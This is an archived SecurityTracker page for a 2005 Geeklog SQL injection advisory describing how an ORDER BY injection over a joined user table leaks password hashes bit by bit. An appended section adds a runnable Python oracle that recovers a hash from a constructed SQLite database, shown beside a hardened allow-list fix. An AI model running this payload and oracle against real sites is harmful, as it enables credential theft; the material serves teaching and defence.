SecurityTracker.com
SecurityTracker Archives

Category:   Application (Forum/Board/Portal)  >   Geeklog
Vendors:   Geeklog
Geeklog Input Validation Hole When Retrieving Article Comments Permits SQL Injection Attacks
SecurityTracker Alert ID:  1014381
SecurityTracker URL:  http://securitytracker.com/id/1014381
CVE Reference:   CVE-2005-2152
Updated:  Jun 24 2008
Original Entry Date:  Jul 5 2005
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  
Version(s): prior to 1.3.11sr1
Description:   An input validation vulnerability was reported in Geeklog. A remote user can inject SQL into the query that retrieves an article's comments.

If a target user has posted at least one comment to an article on the target system and the article has at least one additional comment, then a remote user can supply a specially crafted request that injects into the ORDER BY clause of the comment-retrieval query. Because that query joins the comment table with the user table, the injected expression can reference the target user's password hash, and by observing which comment is returned first the attacker can recover the hash one bit at a time (128 requests for a full MD5 hash). The recovered hash can then be attacked offline.

The flaw resides in 'lib-common.php'.

The vendor was notified on June 30, 2005.

Stefan Esser of the Hardened-PHP Project reported this vulnerability.

The original advisory is available at:

http://www.hardened-php.net/advisory-062005.php

Impact:   A remote user can inject into the ORDER BY clause of a query on the underlying database and, by observing the returned comment order, disclose a target user's password hash.
Solution:   The vendor has issued a fixed version (1.3.11sr1), available at:

http://www.geeklog.net/filemgmt/viewcat.php?cid=8
http://www.geeklog.net/filemgmt/visit.php?lid=574

Vendor URL:  www.geeklog.net/
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  [Full-disclosure] Advisory 06/2005: Geeklog SQL Injection


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


                        Hardened-PHP Project
                        www.hardened-php.net

                      -= Security  Advisory =-



     Advisory: Geeklog SQL Injection Vulnerability
 Release Date: 2005/07/05
Last Modified: 2005/07/05
       Author: Stefan Esser [sesser@hardened-php.net]

  Application: Geeklog <= 1.3.11
     Severity: An input validation flaw within Geeklog allows
               SQL injection and can lead e.g. to user password
               hash disclosure
         Risk: High
Vendor Status: Vendor has released an updated version
   References: http://www.hardened-php.net/advisory-062005.php


Overview:

   Quote from http://www.geeklog.net
   "Geeklog is a weblog powered by PHP and MySQL. It allows you within
   minutes to set up a fully functioning dynamic website, and has many
   features to get you started. As of Geeklog 1.3, these features are:
   
       * User-system, allowing members of the public to register 
         for your site and submit stories.
       * Comment system, allowing users to comment on posts 
         made to your site.
       * Block system, allowing you to put information anywhere 
         on your site.
       * Plugin system that allows you to extend Geeklog, without 
         having to code any new PHP.
       * Theme system that allows users to select what layout they 
         want to view.
       * Excellent security model that allows you to give users 
         control over certain aspects of the site with no need 
         to worry.
       * Site Statistics that show you the most popular areas 
         of your site.
       * Link system that allows users to add links to the site.
       * Calendar System that lets you and your user add 
         up-and-coming events.
       * Allow users to email stories to their friends."

   An audit of the Geeklog sourcebase has revealed a possible SQL 
   injection, that can e.g. lead to disclosure of a user's password
   hash if this user has posted at least one comment to an article
   and that article has at least one other comment.
   
   If the site admin account is also used for commenting to articles
   this means the admin password hash can be revealed with this hole.
   A possible candidate for this is for example some very popular
   site that documents everything about the SCO vs. World process.


Details:

   The Geeklog 1.3.x codebase is one of the PHP applications that
   are quite secure, although it was designed to only run with
   register_globals turned on. They initialise their variables,
   filter user input and escape strings before putting them into
   SQL queries.
   
   Nevertheless our audit has revealed a possible SQL injection in 
   the ORDER BY clause of a query that is used to retrieve user 
   comments for a given article. Usually people believe that such an 
   injection is harmless, because MySQL does not allow multi queries 
   and so you can only influence the order of the returned rows.
   
   In this special case however the query performs a JOIN of the 
   comment and the user table, and therefore it is possible to 
   order the retrieved user comments in dependence on data in the
   user table. Such a conditional ORDER BY statement looks like:
   
     ORDER BY (u.uid=1 && (conv(substring(u.pass, 1, 1),16,10)&1))
   
   This example would order all comments of the user with userid 1
   to the end of all retrieved comments, but only if the lowest bit
   of the first nibble of the password hash is set.
   
   With similar strings it is possible to retrieve the complete
   MD5 hash of the attacked user account, by sending 128 HTTP 
   requests and checking in the returned HTML page if the first 
   (switching search order) comment was written by the user. It
   should be obvious that this issue is only exploitable if there
   are at least 2 comments.
   
   The resulting MD5 hash can then be attacked in the usual way,
   to retrieve the user's password.
   

Proof of Concept:

   The Hardened-PHP Project is not going to release an exploit 
   for this vulnerability to the public.


Disclosure Timeline:

   30. June 2005 - Contacted geeklog.net via email
   01. July 2005 - Sent requested POC to vendor 
   03. July 2005 - Vendor releases bugfixed version
                   (and requested that disclosure not be on 4th July)
   05. July 2005 - Public disclosure


Recommendation:

   We strongly recommend upgrading to the vendor supplied
   new version 
      
      Geeklog 1.3.11sr1
      http://www.geeklog.net/filemgmt/visit.php?lid=574


Special Note to Secunia:

   You have censored 2 of our 3 Cacti advisories. In both we tried 
   hard to help you guys out with short summaries, because you often 
   have enormous problems with understanding advisories.
   
   Unfortunately we forgot to put such a summary into our 3rd Cacti
   advisory and so it is maybe our responsibility that you made up
   a 2nd bug in the administrative interface of Cacti that allows
   execution of arbitrary commands. In the special secunia summary
   we could have explained to you, that executing arbitrary commands
   as admin is one of the features of Cacti.


GPG-Key:

   http://www.hardened-php.net/hardened-php-signature-key.asc

   pub  1024D/0A864AA1 2004-04-17 Hardened-PHP Signature Key
   Key fingerprint = 066F A6D0 E57E 9936 9082  7E52 4439 14CC 0A86 4AA1


Copyright 2005 Stefan Esser. All rights reserved.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQFCybGJRDkUzAqGSqERAoG7AKDqY38M67H+BI2QWqPUMj8EIbmw4gCgu/2g
3fgr9dlH/jnEKWoZRxXU7m8=
=OaI9
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
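The conditional ORDER BY oracle from the advisory's Details section, worked through as an added example. This is not Geeklog's code and not part of the original advisory: it models the flawed query pattern (a sort expression pasted into a query that JOINs comments with users) using SQLite in place of MySQL, so the advisory's conv(substring(u.pass, n, 1), 16, 10) becomes an instr() lookup over the hex alphabet with the same 0..15 result. The table names, the two users, the three comments and the password are constructed; TARGET_UID = 1 follows the advisory's u.uid=1. The second ORDER BY key is an addition that makes the oracle deterministic instead of relying on the database's tie order. A hardened variant of the same query, with an allow-listed sort key, is shown beside the vulnerable one.

```python
"""Blind ORDER BY injection oracle: recovering a joined column bit by bit.

Constructed, self-contained model of the technique described in the
Hardened-PHP advisory; it is NOT Geeklog's code. SQLite stands in for
MySQL, so conv(substring(u.pass, n, 1), 16, 10) becomes an instr()-based
hex-digit lookup that yields the same 0..15 value.
"""
import hashlib
import sqlite3

TARGET_UID = 1          # the advisory's example targets u.uid=1
HEX = "0123456789abcdef"


def build_db():
    """In-memory stand-in for the users/comments tables (constructed data)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users(uid INTEGER PRIMARY KEY, username TEXT, pass TEXT);
        CREATE TABLE comments(cid INTEGER PRIMARY KEY, sid INTEGER,
                              uid INTEGER, comment TEXT);
    """)
    db.executemany("INSERT INTO users VALUES(?,?,?)", [
        (1, "admin", hashlib.md5(b"correct horse").hexdigest()),
        (2, "alice", hashlib.md5(b"alice").hexdigest()),
    ])
    db.executemany("INSERT INTO comments VALUES(?,?,?,?)", [
        (10, 42, 2, "first!"),
        (11, 42, 1, "thanks for reading"),   # the admin has commented on story 42
        (12, 42, 2, "another one"),          # and so has someone else
    ])
    return db


def target_hash(db):
    """Ground truth for checking the oracle (the attacker never sees this)."""
    return db.execute("SELECT pass FROM users WHERE uid=?",
                      (TARGET_UID,)).fetchone()[0]


def fetch_comments_vulnerable(db, sid, order):
    """Models the flawed pattern: the sort expression is concatenated into a
    query that JOINs comments with users, so ORDER BY can reference u.pass."""
    sql = ("SELECT c.cid, u.uid, u.username FROM comments c "
           "JOIN users u ON u.uid = c.uid WHERE c.sid = ? ORDER BY " + order)
    return db.execute(sql, (sid,)).fetchall()


def fetch_comments_fixed(db, sid, order):
    """Hardened form: the sort key is chosen from a fixed allow-list; request
    data never reaches the SQL text."""
    allowed = {"asc": "c.cid ASC", "desc": "c.cid DESC"}
    sql = ("SELECT c.cid, u.uid, u.username FROM comments c "
           "JOIN users u ON u.uid = c.uid WHERE c.sid = ? ORDER BY "
           + allowed.get(order, "c.cid ASC"))
    return db.execute(sql, (sid,)).fetchall()


def bit_probe(pos, bit):
    """Injected ORDER BY payload asking 'is bit <bit> of hex digit <pos> set?'
    (pos is 1-based, as in SQL substr). The first key sends the target's
    comments to the end only when the bit is set, as in the advisory; the
    second key (an addition) puts the target's comments first otherwise, so
    the answer is deterministic as long as another user has commented too."""
    digit = "(instr('%s', substr(u.pass, %d, 1)) - 1)" % (HEX, pos)
    return ("(u.uid=%d AND (%s & %d)) ASC, (u.uid=%d) DESC"
            % (TARGET_UID, digit, 1 << bit, TARGET_UID))


def recover_hash(db, sid, length=32):
    """Drive the oracle: 4 requests per hex digit, 128 for a full MD5 hash."""
    digits = []
    for pos in range(1, length + 1):
        value = 0
        for bit in range(4):
            rows = fetch_comments_vulnerable(db, sid, bit_probe(pos, bit))
            if rows[0][1] != TARGET_UID:    # target's comment sorted to the end
                value |= 1 << bit
        digits.append(HEX[value])
    return "".join(digits)


def request_count(length=32):
    """Number of oracle queries needed for a hash of <length> hex digits."""
    return 4 * length


if __name__ == "__main__":
    db = build_db()
    print("recovered:", recover_hash(db, 42))
    print("actual:   ", target_hash(db))
```

The same payload handed to fetch_comments_fixed is silently replaced by the default sort, which is the whole point of the fix: an ORDER BY position cannot be parameterised with a bound placeholder, so the only safe construction is to map request input onto a fixed set of column expressions rather than escape it.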

Copyright 2019, SecurityGlobal.net LLC